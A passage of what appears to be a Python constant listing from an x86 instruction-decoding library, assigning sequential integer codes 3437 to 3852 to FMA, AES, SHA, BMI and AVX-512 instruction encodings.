EVEX_VFMADDSUB213PD_XMM_K1Z_XMM_XMMM128B64: int = 3437
EVEX_VFMADDSUB213PD_YMM_K1Z_YMM_YMMM256B64: int = 3438
EVEX_VFMADDSUB213PD_ZMM_K1Z_ZMM_ZMMM512B64_ER: int = 3439
VEX_VFMSUBADD213PS_XMM_XMM_XMMM128: int = 3440
VEX_VFMSUBADD213PS_YMM_YMM_YMMM256: int = 3441
VEX_VFMSUBADD213PD_XMM_XMM_XMMM128: int = 3442
VEX_VFMSUBADD213PD_YMM_YMM_YMMM256: int = 3443
EVEX_VFMSUBADD213PS_XMM_K1Z_XMM_XMMM128B32: int = 3444
EVEX_VFMSUBADD213PS_YMM_K1Z_YMM_YMMM256B32: int = 3445
EVEX_VFMSUBADD213PS_ZMM_K1Z_ZMM_ZMMM512B32_ER: int = 3446
EVEX_VFMSUBADD213PD_XMM_K1Z_XMM_XMMM128B64: int = 3447
EVEX_VFMSUBADD213PD_YMM_K1Z_YMM_YMMM256B64: int = 3448
EVEX_VFMSUBADD213PD_ZMM_K1Z_ZMM_ZMMM512B64_ER: int = 3449
VEX_VFMADD213PS_XMM_XMM_XMMM128: int = 3450
VEX_VFMADD213PS_YMM_YMM_YMMM256: int = 3451
VEX_VFMADD213PD_XMM_XMM_XMMM128: int = 3452
VEX_VFMADD213PD_YMM_YMM_YMMM256: int = 3453
EVEX_VFMADD213PS_XMM_K1Z_XMM_XMMM128B32: int = 3454
EVEX_VFMADD213PS_YMM_K1Z_YMM_YMMM256B32: int = 3455
EVEX_VFMADD213PS_ZMM_K1Z_ZMM_ZMMM512B32_ER: int = 3456
EVEX_VFMADD213PD_XMM_K1Z_XMM_XMMM128B64: int = 3457
EVEX_VFMADD213PD_YMM_K1Z_YMM_YMMM256B64: int = 3458
EVEX_VFMADD213PD_ZMM_K1Z_ZMM_ZMMM512B64_ER: int = 3459
VEX_VFMADD213SS_XMM_XMM_XMMM32: int = 3460
VEX_VFMADD213SD_XMM_XMM_XMMM64: int = 3461
EVEX_VFMADD213SS_XMM_K1Z_XMM_XMMM32_ER: int = 3462
EVEX_VFMADD213SD_XMM_K1Z_XMM_XMMM64_ER: int = 3463
VEX_VFMSUB213PS_XMM_XMM_XMMM128: int = 3464
VEX_VFMSUB213PS_YMM_YMM_YMMM256: int = 3465
VEX_VFMSUB213PD_XMM_XMM_XMMM128: int = 3466
VEX_VFMSUB213PD_YMM_YMM_YMMM256: int = 3467
EVEX_VFMSUB213PS_XMM_K1Z_XMM_XMMM128B32: int = 3468
EVEX_VFMSUB213PS_YMM_K1Z_YMM_YMMM256B32: int = 3469
EVEX_VFMSUB213PS_ZMM_K1Z_ZMM_ZMMM512B32_ER: int = 3470
EVEX_VFMSUB213PD_XMM_K1Z_XMM_XMMM128B64: int = 3471
EVEX_VFMSUB213PD_YMM_K1Z_YMM_YMMM256B64: int = 3472
EVEX_VFMSUB213PD_ZMM_K1Z_ZMM_ZMMM512B64_ER: int = 3473
EVEX_V4FNMADDPS_ZMM_K1Z_ZMMP3_M128: int = 3474
VEX_VFMSUB213SS_XMM_XMM_XMMM32: int = 3475
VEX_VFMSUB213SD_XMM_XMM_XMMM64: int = 3476
EVEX_VFMSUB213SS_XMM_K1Z_XMM_XMMM32_ER: int = 3477
EVEX_VFMSUB213SD_XMM_K1Z_XMM_XMMM64_ER: int = 3478
EVEX_V4FNMADDSS_XMM_K1Z_XMMP3_M128: int = 3479
VEX_VFNMADD213PS_XMM_XMM_XMMM128: int = 3480
VEX_VFNMADD213PS_YMM_YMM_YMMM256: int = 3481
VEX_VFNMADD213PD_XMM_XMM_XMMM128: int = 3482
VEX_VFNMADD213PD_YMM_YMM_YMMM256: int = 3483
EVEX_VFNMADD213PS_XMM_K1Z_XMM_XMMM128B32: int = 3484
EVEX_VFNMADD213PS_YMM_K1Z_YMM_YMMM256B32: int = 3485
EVEX_VFNMADD213PS_ZMM_K1Z_ZMM_ZMMM512B32_ER: int = 3486
EVEX_VFNMADD213PD_XMM_K1Z_XMM_XMMM128B64: int = 3487
EVEX_VFNMADD213PD_YMM_K1Z_YMM_YMMM256B64: int = 3488
EVEX_VFNMADD213PD_ZMM_K1Z_ZMM_ZMMM512B64_ER: int = 3489
VEX_VFNMADD213SS_XMM_XMM_XMMM32: int = 3490
VEX_VFNMADD213SD_XMM_XMM_XMMM64: int = 3491
EVEX_VFNMADD213SS_XMM_K1Z_XMM_XMMM32_ER: int = 3492
EVEX_VFNMADD213SD_XMM_K1Z_XMM_XMMM64_ER: int = 3493
VEX_VFNMSUB213PS_XMM_XMM_XMMM128: int = 3494
VEX_VFNMSUB213PS_YMM_YMM_YMMM256: int = 3495
VEX_VFNMSUB213PD_XMM_XMM_XMMM128: int = 3496
VEX_VFNMSUB213PD_YMM_YMM_YMMM256: int = 3497
EVEX_VFNMSUB213PS_XMM_K1Z_XMM_XMMM128B32: int = 3498
EVEX_VFNMSUB213PS_YMM_K1Z_YMM_YMMM256B32: int = 3499
EVEX_VFNMSUB213PS_ZMM_K1Z_ZMM_ZMMM512B32_ER: int = 3500
EVEX_VFNMSUB213PD_XMM_K1Z_XMM_XMMM128B64: int = 3501
EVEX_VFNMSUB213PD_YMM_K1Z_YMM_YMMM256B64: int = 3502
EVEX_VFNMSUB213PD_ZMM_K1Z_ZMM_ZMMM512B64_ER: int = 3503
VEX_VFNMSUB213SS_XMM_XMM_XMMM32: int = 3504
VEX_VFNMSUB213SD_XMM_XMM_XMMM64: int = 3505
EVEX_VFNMSUB213SS_XMM_K1Z_XMM_XMMM32_ER: int = 3506
EVEX_VFNMSUB213SD_XMM_K1Z_XMM_XMMM64_ER: int = 3507
EVEX_VPMADD52LUQ_XMM_K1Z_XMM_XMMM128B64: int = 3508
EVEX_VPMADD52LUQ_YMM_K1Z_YMM_YMMM256B64: int = 3509
EVEX_VPMADD52LUQ_ZMM_K1Z_ZMM_ZMMM512B64: int = 3510
EVEX_VPMADD52HUQ_XMM_K1Z_XMM_XMMM128B64: int = 3511
EVEX_VPMADD52HUQ_YMM_K1Z_YMM_YMMM256B64: int = 3512
EVEX_VPMADD52HUQ_ZMM_K1Z_ZMM_ZMMM512B64: int = 3513
VEX_VFMADDSUB231PS_XMM_XMM_XMMM128: int = 3514
VEX_VFMADDSUB231PS_YMM_YMM_YMMM256: int = 3515
VEX_VFMADDSUB231PD_XMM_XMM_XMMM128: int = 3516
VEX_VFMADDSUB231PD_YMM_YMM_YMMM256: int = 3517
EVEX_VFMADDSUB231PS_XMM_K1Z_XMM_XMMM128B32: int = 3518
EVEX_VFMADDSUB231PS_YMM_K1Z_YMM_YMMM256B32: int = 3519
EVEX_VFMADDSUB231PS_ZMM_K1Z_ZMM_ZMMM512B32_ER: int = 3520
EVEX_VFMADDSUB231PD_XMM_K1Z_XMM_XMMM128B64: int = 3521
EVEX_VFMADDSUB231PD_YMM_K1Z_YMM_YMMM256B64: int = 3522
EVEX_VFMADDSUB231PD_ZMM_K1Z_ZMM_ZMMM512B64_ER: int = 3523
VEX_VFMSUBADD231PS_XMM_XMM_XMMM128: int = 3524
VEX_VFMSUBADD231PS_YMM_YMM_YMMM256: int = 3525
VEX_VFMSUBADD231PD_XMM_XMM_XMMM128: int = 3526
VEX_VFMSUBADD231PD_YMM_YMM_YMMM256: int = 3527
EVEX_VFMSUBADD231PS_XMM_K1Z_XMM_XMMM128B32: int = 3528
EVEX_VFMSUBADD231PS_YMM_K1Z_YMM_YMMM256B32: int = 3529
EVEX_VFMSUBADD231PS_ZMM_K1Z_ZMM_ZMMM512B32_ER: int = 3530
EVEX_VFMSUBADD231PD_XMM_K1Z_XMM_XMMM128B64: int = 3531
EVEX_VFMSUBADD231PD_YMM_K1Z_YMM_YMMM256B64: int = 3532
EVEX_VFMSUBADD231PD_ZMM_K1Z_ZMM_ZMMM512B64_ER: int = 3533
VEX_VFMADD231PS_XMM_XMM_XMMM128: int = 3534
VEX_VFMADD231PS_YMM_YMM_YMMM256: int = 3535
VEX_VFMADD231PD_XMM_XMM_XMMM128: int = 3536
VEX_VFMADD231PD_YMM_YMM_YMMM256: int = 3537
EVEX_VFMADD231PS_XMM_K1Z_XMM_XMMM128B32: int = 3538
EVEX_VFMADD231PS_YMM_K1Z_YMM_YMMM256B32: int = 3539
EVEX_VFMADD231PS_ZMM_K1Z_ZMM_ZMMM512B32_ER: int = 3540
EVEX_VFMADD231PD_XMM_K1Z_XMM_XMMM128B64: int = 3541
EVEX_VFMADD231PD_YMM_K1Z_YMM_YMMM256B64: int = 3542
EVEX_VFMADD231PD_ZMM_K1Z_ZMM_ZMMM512B64_ER: int = 3543
VEX_VFMADD231SS_XMM_XMM_XMMM32: int = 3544
VEX_VFMADD231SD_XMM_XMM_XMMM64: int = 3545
EVEX_VFMADD231SS_XMM_K1Z_XMM_XMMM32_ER: int = 3546
EVEX_VFMADD231SD_XMM_K1Z_XMM_XMMM64_ER: int = 3547
VEX_VFMSUB231PS_XMM_XMM_XMMM128: int = 3548
VEX_VFMSUB231PS_YMM_YMM_YMMM256: int = 3549
VEX_VFMSUB231PD_XMM_XMM_XMMM128: int = 3550
VEX_VFMSUB231PD_YMM_YMM_YMMM256: int = 3551
EVEX_VFMSUB231PS_XMM_K1Z_XMM_XMMM128B32: int = 3552
EVEX_VFMSUB231PS_YMM_K1Z_YMM_YMMM256B32: int = 3553
EVEX_VFMSUB231PS_ZMM_K1Z_ZMM_ZMMM512B32_ER: int = 3554
EVEX_VFMSUB231PD_XMM_K1Z_XMM_XMMM128B64: int = 3555
EVEX_VFMSUB231PD_YMM_K1Z_YMM_YMMM256B64: int = 3556
EVEX_VFMSUB231PD_ZMM_K1Z_ZMM_ZMMM512B64_ER: int = 3557
VEX_VFMSUB231SS_XMM_XMM_XMMM32: int = 3558
VEX_VFMSUB231SD_XMM_XMM_XMMM64: int = 3559
EVEX_VFMSUB231SS_XMM_K1Z_XMM_XMMM32_ER: int = 3560
EVEX_VFMSUB231SD_XMM_K1Z_XMM_XMMM64_ER: int = 3561
VEX_VFNMADD231PS_XMM_XMM_XMMM128: int = 3562
VEX_VFNMADD231PS_YMM_YMM_YMMM256: int = 3563
VEX_VFNMADD231PD_XMM_XMM_XMMM128: int = 3564
VEX_VFNMADD231PD_YMM_YMM_YMMM256: int = 3565
EVEX_VFNMADD231PS_XMM_K1Z_XMM_XMMM128B32: int = 3566
EVEX_VFNMADD231PS_YMM_K1Z_YMM_YMMM256B32: int = 3567
EVEX_VFNMADD231PS_ZMM_K1Z_ZMM_ZMMM512B32_ER: int = 3568
EVEX_VFNMADD231PD_XMM_K1Z_XMM_XMMM128B64: int = 3569
EVEX_VFNMADD231PD_YMM_K1Z_YMM_YMMM256B64: int = 3570
EVEX_VFNMADD231PD_ZMM_K1Z_ZMM_ZMMM512B64_ER: int = 3571
VEX_VFNMADD231SS_XMM_XMM_XMMM32: int = 3572
VEX_VFNMADD231SD_XMM_XMM_XMMM64: int = 3573
EVEX_VFNMADD231SS_XMM_K1Z_XMM_XMMM32_ER: int = 3574
EVEX_VFNMADD231SD_XMM_K1Z_XMM_XMMM64_ER: int = 3575
VEX_VFNMSUB231PS_XMM_XMM_XMMM128: int = 3576
VEX_VFNMSUB231PS_YMM_YMM_YMMM256: int = 3577
VEX_VFNMSUB231PD_XMM_XMM_XMMM128: int = 3578
VEX_VFNMSUB231PD_YMM_YMM_YMMM256: int = 3579
EVEX_VFNMSUB231PS_XMM_K1Z_XMM_XMMM128B32: int = 3580
EVEX_VFNMSUB231PS_YMM_K1Z_YMM_YMMM256B32: int = 3581
EVEX_VFNMSUB231PS_ZMM_K1Z_ZMM_ZMMM512B32_ER: int = 3582
EVEX_VFNMSUB231PD_XMM_K1Z_XMM_XMMM128B64: int = 3583
EVEX_VFNMSUB231PD_YMM_K1Z_YMM_YMMM256B64: int = 3584
EVEX_VFNMSUB231PD_ZMM_K1Z_ZMM_ZMMM512B64_ER: int = 3585
VEX_VFNMSUB231SS_XMM_XMM_XMMM32: int = 3586
VEX_VFNMSUB231SD_XMM_XMM_XMMM64: int = 3587
EVEX_VFNMSUB231SS_XMM_K1Z_XMM_XMMM32_ER: int = 3588
EVEX_VFNMSUB231SD_XMM_K1Z_XMM_XMMM64_ER: int = 3589
EVEX_VPCONFLICTD_XMM_K1Z_XMMM128B32: int = 3590
EVEX_VPCONFLICTD_YMM_K1Z_YMMM256B32: int = 3591
EVEX_VPCONFLICTD_ZMM_K1Z_ZMMM512B32: int = 3592
EVEX_VPCONFLICTQ_XMM_K1Z_XMMM128B64: int = 3593
EVEX_VPCONFLICTQ_YMM_K1Z_YMMM256B64: int = 3594
EVEX_VPCONFLICTQ_ZMM_K1Z_ZMMM512B64: int = 3595
EVEX_VGATHERPF0DPS_VM32Z_K1: int = 3596
EVEX_VGATHERPF0DPD_VM32Y_K1: int = 3597
EVEX_VGATHERPF1DPS_VM32Z_K1: int = 3598
EVEX_VGATHERPF1DPD_VM32Y_K1: int = 3599
EVEX_VSCATTERPF0DPS_VM32Z_K1: int = 3600
EVEX_VSCATTERPF0DPD_VM32Y_K1: int = 3601
EVEX_VSCATTERPF1DPS_VM32Z_K1: int = 3602
EVEX_VSCATTERPF1DPD_VM32Y_K1: int = 3603
EVEX_VGATHERPF0QPS_VM64Z_K1: int = 3604
EVEX_VGATHERPF0QPD_VM64Z_K1: int = 3605
EVEX_VGATHERPF1QPS_VM64Z_K1: int = 3606
EVEX_VGATHERPF1QPD_VM64Z_K1: int = 3607
EVEX_VSCATTERPF0QPS_VM64Z_K1: int = 3608
EVEX_VSCATTERPF0QPD_VM64Z_K1: int = 3609
EVEX_VSCATTERPF1QPS_VM64Z_K1: int = 3610
EVEX_VSCATTERPF1QPD_VM64Z_K1: int = 3611
SHA1NEXTE_XMM_XMMM128: int = 3612
EVEX_VEXP2PS_ZMM_K1Z_ZMMM512B32_SAE: int = 3613
EVEX_VEXP2PD_ZMM_K1Z_ZMMM512B64_SAE: int = 3614
SHA1MSG1_XMM_XMMM128: int = 3615
SHA1MSG2_XMM_XMMM128: int = 3616
EVEX_VRCP28PS_ZMM_K1Z_ZMMM512B32_SAE: int = 3617
EVEX_VRCP28PD_ZMM_K1Z_ZMMM512B64_SAE: int = 3618
SHA256RNDS2_XMM_XMMM128: int = 3619
EVEX_VRCP28SS_XMM_K1Z_XMM_XMMM32_SAE: int = 3620
EVEX_VRCP28SD_XMM_K1Z_XMM_XMMM64_SAE: int = 3621
SHA256MSG1_XMM_XMMM128: int = 3622
EVEX_VRSQRT28PS_ZMM_K1Z_ZMMM512B32_SAE: int = 3623
EVEX_VRSQRT28PD_ZMM_K1Z_ZMMM512B64_SAE: int = 3624
SHA256MSG2_XMM_XMMM128: int = 3625
EVEX_VRSQRT28SS_XMM_K1Z_XMM_XMMM32_SAE: int = 3626
EVEX_VRSQRT28SD_XMM_K1Z_XMM_XMMM64_SAE: int = 3627
GF2P8MULB_XMM_XMMM128: int = 3628
VEX_VGF2P8MULB_XMM_XMM_XMMM128: int = 3629
VEX_VGF2P8MULB_YMM_YMM_YMMM256: int = 3630
EVEX_VGF2P8MULB_XMM_K1Z_XMM_XMMM128: int = 3631
EVEX_VGF2P8MULB_YMM_K1Z_YMM_YMMM256: int = 3632
EVEX_VGF2P8MULB_ZMM_K1Z_ZMM_ZMMM512: int = 3633
AESIMC_XMM_XMMM128: int = 3634
VEX_VAESIMC_XMM_XMMM128: int = 3635
AESENC_XMM_XMMM128: int = 3636
VEX_VAESENC_XMM_XMM_XMMM128: int = 3637
VEX_VAESENC_YMM_YMM_YMMM256: int = 3638
EVEX_VAESENC_XMM_XMM_XMMM128: int = 3639
EVEX_VAESENC_YMM_YMM_YMMM256: int = 3640
EVEX_VAESENC_ZMM_ZMM_ZMMM512: int = 3641
AESENCLAST_XMM_XMMM128: int = 3642
VEX_VAESENCLAST_XMM_XMM_XMMM128: int = 3643
VEX_VAESENCLAST_YMM_YMM_YMMM256: int = 3644
EVEX_VAESENCLAST_XMM_XMM_XMMM128: int = 3645
EVEX_VAESENCLAST_YMM_YMM_YMMM256: int = 3646
EVEX_VAESENCLAST_ZMM_ZMM_ZMMM512: int = 3647
AESDEC_XMM_XMMM128: int = 3648
VEX_VAESDEC_XMM_XMM_XMMM128: int = 3649
VEX_VAESDEC_YMM_YMM_YMMM256: int = 3650
EVEX_VAESDEC_XMM_XMM_XMMM128: int = 3651
EVEX_VAESDEC_YMM_YMM_YMMM256: int = 3652
EVEX_VAESDEC_ZMM_ZMM_ZMMM512: int = 3653
AESDECLAST_XMM_XMMM128: int = 3654
VEX_VAESDECLAST_XMM_XMM_XMMM128: int = 3655
VEX_VAESDECLAST_YMM_YMM_YMMM256: int = 3656
EVEX_VAESDECLAST_XMM_XMM_XMMM128: int = 3657
EVEX_VAESDECLAST_YMM_YMM_YMMM256: int = 3658
EVEX_VAESDECLAST_ZMM_ZMM_ZMMM512: int = 3659
MOVBE_R16_M16: int = 3660
MOVBE_R32_M32: int = 3661
MOVBE_R64_M64: int = 3662
CRC32_R32_RM8: int = 3663
CRC32_R64_RM8: int = 3664
MOVBE_M16_R16: int = 3665
MOVBE_M32_R32: int = 3666
MOVBE_M64_R64: int = 3667
CRC32_R32_RM16: int = 3668
CRC32_R32_RM32: int = 3669
CRC32_R64_RM64: int = 3670
VEX_ANDN_R32_R32_RM32: int = 3671
VEX_ANDN_R64_R64_RM64: int = 3672
VEX_BLSR_R32_RM32: int = 3673
VEX_BLSR_R64_RM64: int = 3674
VEX_BLSMSK_R32_RM32: int = 3675
VEX_BLSMSK_R64_RM64: int = 3676
VEX_BLSI_R32_RM32: int = 3677
VEX_BLSI_R64_RM64: int = 3678
VEX_BZHI_R32_RM32_R32: int = 3679
VEX_BZHI_R64_RM64_R64: int = 3680
WRUSSD_M32_R32: int = 3681
WRUSSQ_M64_R64: int = 3682
VEX_PEXT_R32_R32_RM32: int = 3683
VEX_PEXT_R64_R64_RM64: int = 3684
VEX_PDEP_R32_R32_RM32: int = 3685
VEX_PDEP_R64_R64_RM64: int = 3686
WRSSD_M32_R32: int = 3687
WRSSQ_M64_R64: int = 3688
ADCX_R32_RM32: int = 3689
ADCX_R64_RM64: int = 3690
ADOX_R32_RM32: int = 3691
ADOX_R64_RM64: int = 3692
VEX_MULX_R32_R32_RM32: int = 3693
VEX_MULX_R64_R64_RM64: int = 3694
VEX_BEXTR_R32_RM32_R32: int = 3695
VEX_BEXTR_R64_RM64_R64: int = 3696
VEX_SHLX_R32_RM32_R32: int = 3697
VEX_SHLX_R64_RM64_R64: int = 3698
VEX_SARX_R32_RM32_R32: int = 3699
VEX_SARX_R64_RM64_R64: int = 3700
VEX_SHRX_R32_RM32_R32: int = 3701
VEX_SHRX_R64_RM64_R64: int = 3702
MOVDIR64B_R16_M512: int = 3703
MOVDIR64B_R32_M512: int = 3704
MOVDIR64B_R64_M512: int = 3705
ENQCMDS_R16_M512: int = 3706
ENQCMDS_R32_M512: int = 3707
ENQCMDS_R64_M512: int = 3708
ENQCMD_R16_M512: int = 3709
ENQCMD_R32_M512: int = 3710
ENQCMD_R64_M512: int = 3711
MOVDIRI_M32_R32: int = 3712
MOVDIRI_M64_R64: int = 3713
VEX_VPERMQ_YMM_YMMM256_IMM8: int = 3714
EVEX_VPERMQ_YMM_K1Z_YMMM256B64_IMM8: int = 3715
EVEX_VPERMQ_ZMM_K1Z_ZMMM512B64_IMM8: int = 3716
VEX_VPERMPD_YMM_YMMM256_IMM8: int = 3717
EVEX_VPERMPD_YMM_K1Z_YMMM256B64_IMM8: int = 3718
EVEX_VPERMPD_ZMM_K1Z_ZMMM512B64_IMM8: int = 3719
VEX_VPBLENDD_XMM_XMM_XMMM128_IMM8: int = 3720
VEX_VPBLENDD_YMM_YMM_YMMM256_IMM8: int = 3721
EVEX_VALIGND_XMM_K1Z_XMM_XMMM128B32_IMM8: int = 3722
EVEX_VALIGND_YMM_K1Z_YMM_YMMM256B32_IMM8: int = 3723
EVEX_VALIGND_ZMM_K1Z_ZMM_ZMMM512B32_IMM8: int = 3724
EVEX_VALIGNQ_XMM_K1Z_XMM_XMMM128B64_IMM8: int = 3725
EVEX_VALIGNQ_YMM_K1Z_YMM_YMMM256B64_IMM8: int = 3726
EVEX_VALIGNQ_ZMM_K1Z_ZMM_ZMMM512B64_IMM8: int = 3727
VEX_VPERMILPS_XMM_XMMM128_IMM8: int = 3728
VEX_VPERMILPS_YMM_YMMM256_IMM8: int = 3729
EVEX_VPERMILPS_XMM_K1Z_XMMM128B32_IMM8: int = 3730
EVEX_VPERMILPS_YMM_K1Z_YMMM256B32_IMM8: int = 3731
EVEX_VPERMILPS_ZMM_K1Z_ZMMM512B32_IMM8: int = 3732
VEX_VPERMILPD_XMM_XMMM128_IMM8: int = 3733
VEX_VPERMILPD_YMM_YMMM256_IMM8: int = 3734
EVEX_VPERMILPD_XMM_K1Z_XMMM128B64_IMM8: int = 3735
EVEX_VPERMILPD_YMM_K1Z_YMMM256B64_IMM8: int = 3736
EVEX_VPERMILPD_ZMM_K1Z_ZMMM512B64_IMM8: int = 3737
VEX_VPERM2F128_YMM_YMM_YMMM256_IMM8: int = 3738
ROUNDPS_XMM_XMMM128_IMM8: int = 3739
VEX_VROUNDPS_XMM_XMMM128_IMM8: int = 3740
VEX_VROUNDPS_YMM_YMMM256_IMM8: int = 3741
EVEX_VRNDSCALEPS_XMM_K1Z_XMMM128B32_IMM8: int = 3742
EVEX_VRNDSCALEPS_YMM_K1Z_YMMM256B32_IMM8: int = 3743
EVEX_VRNDSCALEPS_ZMM_K1Z_ZMMM512B32_IMM8_SAE: int = 3744
ROUNDPD_XMM_XMMM128_IMM8: int = 3745
VEX_VROUNDPD_XMM_XMMM128_IMM8: int = 3746
VEX_VROUNDPD_YMM_YMMM256_IMM8: int = 3747
EVEX_VRNDSCALEPD_XMM_K1Z_XMMM128B64_IMM8: int = 3748
EVEX_VRNDSCALEPD_YMM_K1Z_YMMM256B64_IMM8: int = 3749
EVEX_VRNDSCALEPD_ZMM_K1Z_ZMMM512B64_IMM8_SAE: int = 3750
ROUNDSS_XMM_XMMM32_IMM8: int = 3751
VEX_VROUNDSS_XMM_XMM_XMMM32_IMM8: int = 3752
EVEX_VRNDSCALESS_XMM_K1Z_XMM_XMMM32_IMM8_SAE: int = 3753
ROUNDSD_XMM_XMMM64_IMM8: int = 3754
VEX_VROUNDSD_XMM_XMM_XMMM64_IMM8: int = 3755
EVEX_VRNDSCALESD_XMM_K1Z_XMM_XMMM64_IMM8_SAE: int = 3756
BLENDPS_XMM_XMMM128_IMM8: int = 3757
VEX_VBLENDPS_XMM_XMM_XMMM128_IMM8: int = 3758
VEX_VBLENDPS_YMM_YMM_YMMM256_IMM8: int = 3759
BLENDPD_XMM_XMMM128_IMM8: int = 3760
VEX_VBLENDPD_XMM_XMM_XMMM128_IMM8: int = 3761
VEX_VBLENDPD_YMM_YMM_YMMM256_IMM8: int = 3762
PBLENDW_XMM_XMMM128_IMM8: int = 3763
VEX_VPBLENDW_XMM_XMM_XMMM128_IMM8: int = 3764
VEX_VPBLENDW_YMM_YMM_YMMM256_IMM8: int = 3765
PALIGNR_MM_MMM64_IMM8: int = 3766
PALIGNR_XMM_XMMM128_IMM8: int = 3767
VEX_VPALIGNR_XMM_XMM_XMMM128_IMM8: int = 3768
VEX_VPALIGNR_YMM_YMM_YMMM256_IMM8: int = 3769
EVEX_VPALIGNR_XMM_K1Z_XMM_XMMM128_IMM8: int = 3770
EVEX_VPALIGNR_YMM_K1Z_YMM_YMMM256_IMM8: int = 3771
EVEX_VPALIGNR_ZMM_K1Z_ZMM_ZMMM512_IMM8: int = 3772
PEXTRB_R32M8_XMM_IMM8: int = 3773
PEXTRB_R64M8_XMM_IMM8: int = 3774
VEX_VPEXTRB_R32M8_XMM_IMM8: int = 3775
VEX_VPEXTRB_R64M8_XMM_IMM8: int = 3776
EVEX_VPEXTRB_R32M8_XMM_IMM8: int = 3777
EVEX_VPEXTRB_R64M8_XMM_IMM8: int = 3778
PEXTRW_R32M16_XMM_IMM8: int = 3779
PEXTRW_R64M16_XMM_IMM8: int = 3780
VEX_VPEXTRW_R32M16_XMM_IMM8: int = 3781
VEX_VPEXTRW_R64M16_XMM_IMM8: int = 3782
EVEX_VPEXTRW_R32M16_XMM_IMM8: int = 3783
EVEX_VPEXTRW_R64M16_XMM_IMM8: int = 3784
PEXTRD_RM32_XMM_IMM8: int = 3785
PEXTRQ_RM64_XMM_IMM8: int = 3786
VEX_VPEXTRD_RM32_XMM_IMM8: int = 3787
VEX_VPEXTRQ_RM64_XMM_IMM8: int = 3788
EVEX_VPEXTRD_RM32_XMM_IMM8: int = 3789
EVEX_VPEXTRQ_RM64_XMM_IMM8: int = 3790
EXTRACTPS_RM32_XMM_IMM8: int = 3791
EXTRACTPS_R64M32_XMM_IMM8: int = 3792
VEX_VEXTRACTPS_RM32_XMM_IMM8: int = 3793
VEX_VEXTRACTPS_R64M32_XMM_IMM8: int = 3794
EVEX_VEXTRACTPS_RM32_XMM_IMM8: int = 3795
EVEX_VEXTRACTPS_R64M32_XMM_IMM8: int = 3796
VEX_VINSERTF128_YMM_YMM_XMMM128_IMM8: int = 3797
EVEX_VINSERTF32X4_YMM_K1Z_YMM_XMMM128_IMM8: int = 3798
EVEX_VINSERTF32X4_ZMM_K1Z_ZMM_XMMM128_IMM8: int = 3799
EVEX_VINSERTF64X2_YMM_K1Z_YMM_XMMM128_IMM8: int = 3800
EVEX_VINSERTF64X2_ZMM_K1Z_ZMM_XMMM128_IMM8: int = 3801
VEX_VEXTRACTF128_XMMM128_YMM_IMM8: int = 3802
EVEX_VEXTRACTF32X4_XMMM128_K1Z_YMM_IMM8: int = 3803
EVEX_VEXTRACTF32X4_XMMM128_K1Z_ZMM_IMM8: int = 3804
EVEX_VEXTRACTF64X2_XMMM128_K1Z_YMM_IMM8: int = 3805
EVEX_VEXTRACTF64X2_XMMM128_K1Z_ZMM_IMM8: int = 3806
EVEX_VINSERTF32X8_ZMM_K1Z_ZMM_YMMM256_IMM8: int = 3807
EVEX_VINSERTF64X4_ZMM_K1Z_ZMM_YMMM256_IMM8: int = 3808
EVEX_VEXTRACTF32X8_YMMM256_K1Z_ZMM_IMM8: int = 3809
EVEX_VEXTRACTF64X4_YMMM256_K1Z_ZMM_IMM8: int = 3810
VEX_VCVTPS2PH_XMMM64_XMM_IMM8: int = 3811
VEX_VCVTPS2PH_XMMM128_YMM_IMM8: int = 3812
EVEX_VCVTPS2PH_XMMM64_K1Z_XMM_IMM8: int = 3813
EVEX_VCVTPS2PH_XMMM128_K1Z_YMM_IMM8: int = 3814
EVEX_VCVTPS2PH_YMMM256_K1Z_ZMM_IMM8_SAE: int = 3815
EVEX_VPCMPUD_KR_K1_XMM_XMMM128B32_IMM8: int = 3816
EVEX_VPCMPUD_KR_K1_YMM_YMMM256B32_IMM8: int = 3817
EVEX_VPCMPUD_KR_K1_ZMM_ZMMM512B32_IMM8: int = 3818
EVEX_VPCMPUQ_KR_K1_XMM_XMMM128B64_IMM8: int = 3819
EVEX_VPCMPUQ_KR_K1_YMM_YMMM256B64_IMM8: int = 3820
EVEX_VPCMPUQ_KR_K1_ZMM_ZMMM512B64_IMM8: int = 3821
EVEX_VPCMPD_KR_K1_XMM_XMMM128B32_IMM8: int = 3822
EVEX_VPCMPD_KR_K1_YMM_YMMM256B32_IMM8: int = 3823
EVEX_VPCMPD_KR_K1_ZMM_ZMMM512B32_IMM8: int = 3824
EVEX_VPCMPQ_KR_K1_XMM_XMMM128B64_IMM8: int = 3825
EVEX_VPCMPQ_KR_K1_YMM_YMMM256B64_IMM8: int = 3826
EVEX_VPCMPQ_KR_K1_ZMM_ZMMM512B64_IMM8: int = 3827
PINSRB_XMM_R32M8_IMM8: int = 3828
PINSRB_XMM_R64M8_IMM8: int = 3829
VEX_VPINSRB_XMM_XMM_R32M8_IMM8: int = 3830
VEX_VPINSRB_XMM_XMM_R64M8_IMM8: int = 3831
EVEX_VPINSRB_XMM_XMM_R32M8_IMM8: int = 3832
EVEX_VPINSRB_XMM_XMM_R64M8_IMM8: int = 3833
INSERTPS_XMM_XMMM32_IMM8: int = 3834
VEX_VINSERTPS_XMM_XMM_XMMM32_IMM8: int = 3835
EVEX_VINSERTPS_XMM_XMM_XMMM32_IMM8: int = 3836
PINSRD_XMM_RM32_IMM8: int = 3837
PINSRQ_XMM_RM64_IMM8: int = 3838
VEX_VPINSRD_XMM_XMM_RM32_IMM8: int = 3839
VEX_VPINSRQ_XMM_XMM_RM64_IMM8: int = 3840
EVEX_VPINSRD_XMM_XMM_RM32_IMM8: int = 3841
EVEX_VPINSRQ_XMM_XMM_RM64_IMM8: int = 3842
EVEX_VSHUFF32X4_YMM_K1Z_YMM_YMMM256B32_IMM8: int = 3843
EVEX_VSHUFF32X4_ZMM_K1Z_ZMM_ZMMM512B32_IMM8: int = 3844
EVEX_VSHUFF64X2_YMM_K1Z_YMM_YMMM256B64_IMM8: int = 3845
EVEX_VSHUFF64X2_ZMM_K1Z_ZMM_ZMMM512B64_IMM8: int = 3846
EVEX_VPTERNLOGD_XMM_K1Z_XMM_XMMM128B32_IMM8: int = 3847
EVEX_VPTERNLOGD_YMM_K1Z_YMM_YMMM256B32_IMM8: int = 3848
EVEX_VPTERNLOGD_ZMM_K1Z_ZMM_ZMMM512B32_IMM8: int = 3849
EVEX_VPTERNLOGQ_XMM_K1Z_XMM_XMMM128B64_IMM8: int = 3850
EVEX_VPTERNLOGQ_YMM_K1Z_YMM_YMMM256B64_IMM8: int = 3851
EVEX_VPTERNLOGQ_ZMM_K1Z_ZMM_ZMMM512B64_IMM8: int = 3852
